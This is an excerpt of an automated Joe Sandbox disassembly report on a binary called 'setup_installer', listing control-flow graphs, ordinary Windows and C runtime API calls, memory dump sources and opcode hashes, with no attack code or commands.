                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: memcmp$H_prologmemmove
                                        • String ID:
                                        • API String ID: 1585842370-0
                                        • Opcode ID: 53a639813324c0e6f53735f609cf536863337ed91f2060eb649b985a43864c96
                                        • Instruction ID: 38dfcbe944138311f729fb0dfaf23ea4560b4517be3ec0a244e0583db9330822
                                        • Opcode Fuzzy Hash: 53a639813324c0e6f53735f609cf536863337ed91f2060eb649b985a43864c96
                                        • Instruction Fuzzy Hash: E241AC72D002499BCF11DFA4C840BEEBBB5AF45384F14416AE855772E2E3389A85CB68

                                        Control-flow Graph

                                        control_flow_graph 781 40bcc7-40bcf7 call 418d80 EnterCriticalSection 784 40bcf9-40bcfc 781->784 785 40bcfe-40bd0b call 406827 781->785 784->785 786 40bd22-40bd39 call 406749 784->786 787 40bd0e-40bd11 785->787 790 40bd3c-40bd5a 786->790 788 40bd61-40bd79 LeaveCriticalSection 787->788 789 40bd13-40bd1f 787->789 789->786 790->788 791 40bd5c-40bd5f 790->791 791->788
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040BCCC
                                        • EnterCriticalSection.KERNEL32(?), ref: 0040BCE1
                                        • LeaveCriticalSection.KERNEL32(?), ref: 0040BD64
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterH_prologLeave
                                        • String ID:
                                        • API String ID: 367238759-0
                                        • Opcode ID: 223f6b15eeea2771948690ca3a414ea69c75efdbba2d22d621701fa7eab4f037
                                        • Instruction ID: 6cfa36094df7fceee4fe309223ea3ff0f653a710c7f9d26e1c3ca6cc2b4dbde7
                                        • Opcode Fuzzy Hash: 223f6b15eeea2771948690ca3a414ea69c75efdbba2d22d621701fa7eab4f037
                                        • Instruction Fuzzy Hash: F82128756007009FDB28CF14D884A6BB7B5FF88714F10895EE8569B7A1C774E944CBA4

                                        Control-flow Graph

                                        control_flow_graph 1118 409dad-409dc5 call 418d80 1121 409dc7-409dcd 1118->1121 1122 409dcf-409dd4 1118->1122 1121->1122 1123 409dd6-409ddc 1122->1123 1124 409ddf-409de4 1122->1124 1123->1124 1125 409de6-409dec 1124->1125 1126 409def-409e33 call 409944 call 40429a call 40368d call 403a5b 1124->1126 1125->1126 1138 409e45-409e5f 1126->1138 1139 409e35-409e40 call 40376e 1126->1139 1141 409e61-409e64 1138->1141 1142 409e73-409e7e 1138->1142 1139->1138 1143 409e66 1141->1143 1144 409e69-409e70 call 4031dd 1141->1144 1145 409e80-409e8c 1142->1145 1146 409e8e-409e91 1142->1146 1143->1144 1144->1142 1145->1145 1145->1146 1148 409ea1-409ea8 1146->1148 1149 409e93-409e9f 1146->1149 1151 409eab-409eb3 1148->1151 1149->1151 1152 409ed4-409edf 1151->1152 1153 409eb5-409ecf call 4088fd 1151->1153 1155 409ee5-409ef7 1152->1155 1156 409f6f-409f72 1152->1156 1167 409f99-409fa4 1153->1167 1160 409ef9-409efc 1155->1160 1161 409efe-409f10 call 4032ce 1155->1161 1157 409f74-409f7a 1156->1157 1158 409f89-409f94 1156->1158 1163 409f86 1157->1163 1164 409f7c-409f81 1157->1164 1166 409f96 1158->1166 1158->1167 1160->1161 1162 409f12-409f23 call 40b70b 1160->1162 1161->1162 1173 409f5e-409f69 1161->1173 1162->1173 1178 409f25-409f33 call 409144 1162->1178 1163->1158 1168 40a16d-40a190 call 403204 * 4 1164->1168 1166->1167 1171 409fd1-409fe6 1167->1171 1172 409fa6-409fb6 call 406827 1167->1172 1211 40a192-40a1a0 1168->1211 1176 40a166-40a168 1171->1176 1177 409fec-409ff5 1171->1177 1186 40a1a3-40a1a5 1172->1186 1187 409fbc-409fc6 call 406827 1172->1187 1173->1155 1173->1156 1176->1168 1180 40a16a-40a16c 1176->1180 1182 409ff7-409ffa 1177->1182 1183 409ffd-40a003 1177->1183 1196 409f53-409f59 call 4088fd 1178->1196 1197 409f35-409f51 call 40b406 1178->1197 1180->1168 1182->1183 1183->1176 1184 40a009-40a01d 1183->1184 1190 40a032-40a037 1184->1190 1191 40a01f-40a02c 1184->1191 1186->1168 1198 409fc9-409fcb 1187->1198 1194 40a039-40a040 call 406827 1190->1194 1195 40a04b-40a069 call 409d49 1190->1195 1191->1186 1191->1190 1205 40a043-40a045 1194->1205 1209 40a1a7-40a1b0 1195->1209 1210 40a06f-40a074 1195->1210 1196->1173 1197->1173 1198->1171 1198->1186 1205->1186 1205->1195 1212 40a1b2-40a1b4 1209->1212 1213 40a1b8-40a1bb 1209->1213 1214 40a076-40a07a 1210->1214 1215 40a07f-40a082 1210->1215 1212->1213 1213->1168 1216 40a157-40a160 1214->1216 1217 40a084-40a09c 1215->1217 1218 40a0a5-40a0bf 1215->1218 1216->1176 1216->1184 1267 40a09d call 40e520 1217->1267 1268 40a09d call 40ed82 1217->1268 1222 40a0c5-40a0da 1218->1222 1223 40a1bd-40a1c6 1218->1223 1219 40a0a0-40a0a3 1221 40a0e2-40a0f6 call 409970 1219->1221 1232 40a1f8-40a201 1221->1232 1233 40a0fc-40a100 1221->1233 1222->1221 1231 40a0dc-40a0de 1222->1231 1225 40a1c8-40a1ca 1223->1225 1226 40a1ce-40a1f6 call 403204 * 4 1223->1226 1225->1226 1226->1211 1231->1221 1235 40a203-40a205 1232->1235 1236 40a209-40a20c 1232->1236 1237 40a106-40a109 1233->1237 1238 40a22b-40a22e 1233->1238 1235->1236 1236->1168 1242 40a115 1237->1242 1243 40a10b-40a113 1237->1243 1239 40a230-40a239 1238->1239 1240 40a249-40a25c call 4063e5 1238->1240 1245 40a241-40a244 1239->1245 1246 40a23b-40a23d 1239->1246 1240->1168 1256 40a262-40a268 1240->1256 1244 40a118-40a11b 1242->1244 1243->1242 1243->1244 1249 40a146-40a14f 1244->1249 1250 40a11d-40a121 1244->1250 1245->1168 1246->1245 1249->1216 1255 40a151-40a153 1249->1255 1250->1249 1253 40a123-40a13b call 40a26d 1250->1253 1253->1249 1261 40a13d-40a140 1253->1261 1255->1216 1256->1168 1261->1249 1262 40a211-40a21a 1261->1262 1262->1180 1263 40a220-40a226 1262->1263 1263->1180 1267->1219 1268->1219
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Split
                                        • API String ID: 3519838083-1882502421
                                        • Opcode ID: 4df85aa84943a756da905cd6b24cfb30d96fa98b4a0dc77eabcbb0f2acb6280f
                                        • Instruction ID: 09c5a0370ad5ed14047af77479f4839a91d55b5c5a0b00876ef22aa24b9ab58f
                                        • Opcode Fuzzy Hash: 4df85aa84943a756da905cd6b24cfb30d96fa98b4a0dc77eabcbb0f2acb6280f
                                        • Instruction Fuzzy Hash: 98022A70A00249EFCB10DFA5C8849AEBBB5BF48304F14847EE516EB392C739AE55CB55

                                        Control-flow Graph

                                        APIs
                                        • __EH_prolog.LIBCMT ref: 004026C6
                                          • Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Default
                                        • API String ID: 3519838083-753088835
                                        • Opcode ID: 292ea48c8768a95794b35225bdc2b66726df2df7c89ab67701c3af441bcaefd0
                                        • Instruction ID: a54c0451a2b32841cee07a3996f3f819ed4c8f4dfc8041cf4803658e5a70c8e5
                                        • Opcode Fuzzy Hash: 292ea48c8768a95794b35225bdc2b66726df2df7c89ab67701c3af441bcaefd0
                                        • Instruction Fuzzy Hash: 84515171800109ABDB11EFA5C981EDDFBB9BF14308F1085AEE515B32D2DB786A09CF54

                                        Control-flow Graph

                                        control_flow_graph 1341 40fe8a-40ff0f call 418d80 call 40e063 call 40e83c * 2 call 40fc2a call 40bc60 1354 40ff15 1341->1354 1355 41003d-410045 1341->1355 1356 40ff1a-40ff40 call 410d82 1354->1356 1357 410047-410057 1355->1357 1358 41005a-410064 call 40dc5d 1355->1358 1363 40ff46-40ff48 1356->1363 1364 4100a6-4100b5 _CxxThrowException 1356->1364 1357->1358 1362 410069-410093 call 403204 * 3 call 40df15 1358->1362 1392 410095-4100a3 1362->1392 1363->1364 1367 40ff4e-40ff5e call 407ab8 call 4031dd 1363->1367 1366 4100ba-4100c0 1364->1366 1369 4100c2-4100c4 1366->1369 1370 4100c8-410104 call 40dc5d call 403204 * 3 call 40df15 1366->1370 1383 40ff60-40ff6b 1367->1383 1384 40ff6d 1367->1384 1369->1370 1370->1392 1387 40ff6f-40ff74 1383->1387 1384->1387 1390 40ff76-40ff78 1387->1390 1391 40ff7c-40ffc4 call 40bd85 1387->1391 1390->1391 1395 40ffc9-40ffce 1391->1395 1395->1366 1397 40ffd4-40ffd7 1395->1397 1399 40ffe0-40ffe9 1397->1399 1400 40ffd9-40ffdc 1397->1400 1402 41001a-410020 1399->1402 1403 40ffeb-40fff4 1399->1403 1400->1399 1405 410022-410024 1402->1405 1406 410028-410034 1402->1406 1403->1402 1404 40fff6-410013 call 418c10 1403->1404 1404->1402 1411 410015 call 40e966 1404->1411 1405->1406 1407 40ff17 1406->1407 1408 41003a 1406->1408 1407->1356 1408->1355 1411->1402
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040FE8F
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 004100B5
                                          • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                          • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$H_prologmalloc
                                        • String ID:
                                        • API String ID: 3044594480-0
                                        • Opcode ID: 33641076fc2728d8ba28cdde326b41d1189eb1e6bfb453c54c8ab34be38ba523
                                        • Instruction ID: 88fd23d13b2165b9f29fbfc804bd3c55ab1378a3526c832d929a2e01daa6a8e0
                                        • Opcode Fuzzy Hash: 33641076fc2728d8ba28cdde326b41d1189eb1e6bfb453c54c8ab34be38ba523
                                        • Instruction Fuzzy Hash: 5B814E71D002499FCB21DFA9C881AEEBBB4AF09304F1480AEE555B7292C7785E85CF65

                                        Control-flow Graph
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040467D
                                          • Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4
                                        • SetLastError.KERNEL32(0000010B,?,75C50B80,?,00000000), ref: 004046D8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$ErrorLast
                                        • String ID:
                                        • API String ID: 2901101390-0
                                        • Opcode ID: 898bcb3355352a636011a3579ef66ddfafa831f9b504ef7429c9327cc1ab5d0d
                                        • Instruction ID: 7e41f2cfff906f94df3d93499aef528f4dd0a588830c47bb788408f42dae3ac8
                                        • Opcode Fuzzy Hash: 898bcb3355352a636011a3579ef66ddfafa831f9b504ef7429c9327cc1ab5d0d
                                        • Instruction Fuzzy Hash: 8D416C71C002089ADF14EBA6D442AEDBB74AF45318F2080BEE661731D2DB3D6A09DB18

                                        Control-flow Graph

                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040B295
                                          • Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        • _CxxThrowException.MSVCRT(?,0041C760), ref: 0040B2F4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowfree
                                        • String ID:
                                        • API String ID: 1371406966-0
                                        • Opcode ID: ec4d247574fff5ead4947f581fa00135c9d74d8b5b33173528e34598dd795744
                                        • Instruction ID: 3991b56aa772d61d3444a8cef0fd9670766af5abd261621a3301c4c09fd1f304
                                        • Opcode Fuzzy Hash: ec4d247574fff5ead4947f581fa00135c9d74d8b5b33173528e34598dd795744
                                        • Instruction Fuzzy Hash: 11012175640204AAC725EF22C451BDEBFF4EF80314F00852FE892A32E1CB786A49CB48

                                        Control-flow Graph
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040531F
                                        • GetLastError.KERNEL32(?,?,?,?), ref: 0040532C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: e5f51623b6d1066f15c38e0f7a766acb83092e1d779a669a0f1b84784c969e98
                                        • Instruction ID: 9124dc6d7053f8d6efb0d5dd32d4d25d1ca9512a9ee8f9f64a9de147337f6b78
                                        • Opcode Fuzzy Hash: e5f51623b6d1066f15c38e0f7a766acb83092e1d779a669a0f1b84784c969e98
                                        • Instruction Fuzzy Hash: 11F04971600208ABCB11DF69DC05BDB3BE5EB49354F108165F915E72A0E6759D10AAA4
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00410B26
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 00410B65
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ExceptionH_prologThrow
                                        • String ID:
                                        • API String ID: 461045715-0
                                        • Opcode ID: 8af01c6eb10b9063be972fec532e90461c8519683e3f33f3519498f04b14a68e
                                        • Instruction ID: 66cfeec8bba6f5a58313027dc29a8bde198ffc6f74079f781ea7209b80be1e28
                                        • Opcode Fuzzy Hash: 8af01c6eb10b9063be972fec532e90461c8519683e3f33f3519498f04b14a68e
                                        • Instruction Fuzzy Hash: 86F0FC71548344AEDB11DB98C4457EEBBA4EB55318F04405FF0449B241C7FCB9C487A9
                                        APIs
                                        • _beginthreadex.MSVCRT ref: 00418A94
                                        • GetLastError.KERNEL32(?,?,75C50B80,00000000,00000000), ref: 00418AA9
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ErrorLast_beginthreadex
                                        • String ID:
                                        • API String ID: 4034172046-0
                                        • Opcode ID: c548e9af719ead334f14ed1d54a67b1793e344066bbd5669ca46e26d0f3a0ecb
                                        • Instruction ID: 70daae52a94726005310dc0db4673b1cb6198bfb299c528c22bbb718e3dc4f27
                                        • Opcode Fuzzy Hash: c548e9af719ead334f14ed1d54a67b1793e344066bbd5669ca46e26d0f3a0ecb
                                        • Instruction Fuzzy Hash: D2E0E6B12052026FE3109B64DC15FA77698EF94781F44847EB545D6280EB749850C7B9
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,004025E4,?,00000000,?,00000000,?,?,75C50B80,00000000,00000000), ref: 00418A4A
                                        • GetLastError.KERNEL32(?,75C50B80,00000000,00000000), ref: 00418A54
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ChangeCloseErrorFindLastNotification
                                        • String ID:
                                        • API String ID: 1687624791-0
                                        • Opcode ID: 0433229ef2530785905c04bfe02dbd6fb0e4ed519826bd7185666009005914ad
                                        • Instruction ID: 7535ee298610e88dfaab19b27145df70c5ba92bd44e4c2e9d74370dd166c20af
                                        • Opcode Fuzzy Hash: 0433229ef2530785905c04bfe02dbd6fb0e4ed519826bd7185666009005914ad
                                        • Instruction Fuzzy Hash: EDD09E316141118FEB705F79BC087D726D8AF04791F15846FB450C2344EF68CDC146A8
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,00405FF7), ref: 00405FDB
                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 00405FE2
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        • Opcode ID: 07db69285f0a9f4bd27611239e22615ac5e837d892164ec821e022bab2d23e48
                                        • Instruction ID: 732ff7f231baee20a9cffd8d9fa0ed88e0eff740d633cb47fb09654a2f39704a
                                        • Opcode Fuzzy Hash: 07db69285f0a9f4bd27611239e22615ac5e837d892164ec821e022bab2d23e48
                                        • Instruction Fuzzy Hash: 80B092B1400104ABCE009BA0DE0C86B3E2CEA0C2013048468B215C1012DB3AC0018BA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ExceptionThrowmalloc
                                        • String ID:
                                        • API String ID: 2436765578-0
                                        • Opcode ID: a06ede8ce10373c961941a0e1058ae9254320e152fb985f8e6ab7cb75a938dad
                                        • Instruction ID: 21ad3b6c62fa819954115c8b0a5ff63e7c490964cbfc0d860bfe7ccd9a4adc8e
                                        • Opcode Fuzzy Hash: a06ede8ce10373c961941a0e1058ae9254320e152fb985f8e6ab7cb75a938dad
                                        • Instruction Fuzzy Hash: D9D0A73114434C7ACF016FE19C059CA3F5C9901671B00D46BF8588E116D634D3844758
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: bab2c70395a9ac63ff2a1e6cf90ccf3ca4ad1d567fbb6c2056be4227cc6cc286
                                        • Instruction ID: f668b284c9a992d87cd6d5ed2065a62fb7c1b42155693d61c0c1031baec4afb4
                                        • Opcode Fuzzy Hash: bab2c70395a9ac63ff2a1e6cf90ccf3ca4ad1d567fbb6c2056be4227cc6cc286
                                        • Instruction Fuzzy Hash: 9F327F70E04249DFDF11CFE8C984BAEBBB5AF49304F1440AAE845A7391C779AE49CB15
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 03cf4591cf909b2d04c6413f81e879f8fbbf87ed20dd82c53fd02e17f46b7009
                                        • Instruction ID: 25566729ef2c52a6845be5edffbec3a608f7ce3cf95c208b8dc0a298da87cac0
                                        • Opcode Fuzzy Hash: 03cf4591cf909b2d04c6413f81e879f8fbbf87ed20dd82c53fd02e17f46b7009
                                        • Instruction Fuzzy Hash: 24128E71900209DFCF10DFA4C888ADEBBB5AF48314F2485AAE459BB2D1D738AE45CF55
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00401F2B
                                          • Part of subcall function 004023F0: EnterCriticalSection.KERNEL32(?,?,?,0040B84D), ref: 004023F5
                                          • Part of subcall function 004023F0: LeaveCriticalSection.KERNEL32(?,?,?,?,0040B84D), ref: 004023FF
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterH_prologLeave
                                        • String ID:
                                        • API String ID: 367238759-0
                                        • Opcode ID: 220cea634fa4220f2899e35a25b328741d65bd45df79bc03c8ba1a60db2c5a6d
                                        • Instruction ID: 9aea0566c9c0e61cfee338e95f65c5ac720cc4bbfeed0489b5d27597e260e310
                                        • Opcode Fuzzy Hash: 220cea634fa4220f2899e35a25b328741d65bd45df79bc03c8ba1a60db2c5a6d
                                        • Instruction Fuzzy Hash: 62D19E7090020ADFCF10EFA5C9849EEBBB5AF54308F14846FE506B72D1DB786A46CB19
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040A2CD
                                          • Part of subcall function 00409DAD: __EH_prolog.LIBCMT ref: 00409DB2
                                          • Part of subcall function 00408FCD: __EH_prolog.LIBCMT ref: 00408FD2
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        • Opcode ID: 55abee7260f8abe240855f7b25643b941ebcc1b184b95c31af575d9cb9fe0adf
                                        • Instruction ID: 9e12673def2b6459cc981bd691141fc0cb4a79b6ab5f4124fe6ffa379ca14ef1
                                        • Opcode Fuzzy Hash: 55abee7260f8abe240855f7b25643b941ebcc1b184b95c31af575d9cb9fe0adf
                                        • Instruction Fuzzy Hash: 6A618375600205AFCB20EF61C885EAEBBB8EF44308F10447FE545B72D1DAB8AD55CB55
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040AFAC
